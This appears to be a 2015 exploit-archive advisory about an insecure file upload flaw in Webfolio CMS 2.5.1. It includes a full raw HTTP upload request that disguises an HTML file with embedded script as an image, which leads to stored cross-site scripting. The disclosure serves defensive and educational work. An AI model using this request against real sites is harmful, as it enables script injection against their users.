Home / os / winmobile

Webfolio CMS 2.5.1 Insecure File Upload

Posted on 09 August 2015

# Exploit Title: Insecure File Upload in webfolio2.5.1
# Date:04 august 2015
# Exploit Author: Sharankumar somana
# Vendor Homepage: http://webfolio-cms.sourceforge.net/
# Software Link: http://sourceforge.net/projects/webfolio-cms/?source=typ_redirect
# Version: 2.5.1
# Tested on: Windows 7

_________________________________________________________________________________________________________________________

Insecure File Upload

Webfolio cms is vulnerable for insecure file upload vulnerability.The applictaion checks for the size and content type of the files while uploading, however it fails to check the extention of the uploaded files. A malicious user can successfully upload a valid image file with javascript embedded in it and changing the extention to html. An attacker can take advantage of this issue to perform persistent cross site scripting attacks.

Raw Request:

POST /webfolio/wfcms2/admin/users/edit/1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://localhost/webfolio/wfcms2/admin/users/edit/1
Cookie: PHPSESSID=fp7drdbohoi5v1ni242iuoq303;
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------17740215416001
Content-Length: 123677

-----------------------------17740215416001
Content-Disposition: form-data; name="UserAccountInfo[username]"

admin
-----------------------------17740215416001
Content-Disposition: form-data; name="UserAccountInfo[password]"

-----------------------------17740215416001
Content-Disposition: form-data; name="UserAccountInfo[passwdConfirm]"

-----------------------------17740215416001
Content-Disposition: form-data; name="UserAccountInfo[email]"

sharan@gmail.com
-----------------------------17740215416001
Content-Disposition: form-data; name="UserAccountInfo[role]"

10
-----------------------------17740215416001
Content-Disposition: form-data; name="UserProfile[realName]"

sharan
-----------------------------17740215416001
Content-Disposition: form-data; name="UserProfile[aboutText]"

testing 123
-----------------------------17740215416001
Content-Disposition: form-data; name="UserProfile[dateOfBirth]"

1990-08-04
-----------------------------17740215416001
Content-Disposition: form-data; name="UserProfile[picture]"; filename="test.html"
Content-Type: image/jpeg

Valid image file data followed by javascript code
<html>
<script>alert(1)</script>
</html>

-----------------------------17740215416001
Content-Disposition: form-data; name="UserProfile[picture][current_file_name]"

php1678_55bfc11748cdf.html
-----------------------------17740215416001
Content-Disposition: form-data; name="UserProfile[timeZone]"

UTC
-----------------------------17740215416001
Content-Disposition: form-data; name="UserProfile[website]"

-----------------------------17740215416001
Content-Disposition: form-data; name="_csrf"

af184c6a94f8485fae50c8e5bc320695
-----------------------------17740215416001
Content-Disposition: form-data; name="btnSave"

Save changes
-----------------------------17740215416001--

 

TOP

Malware :

Exploits :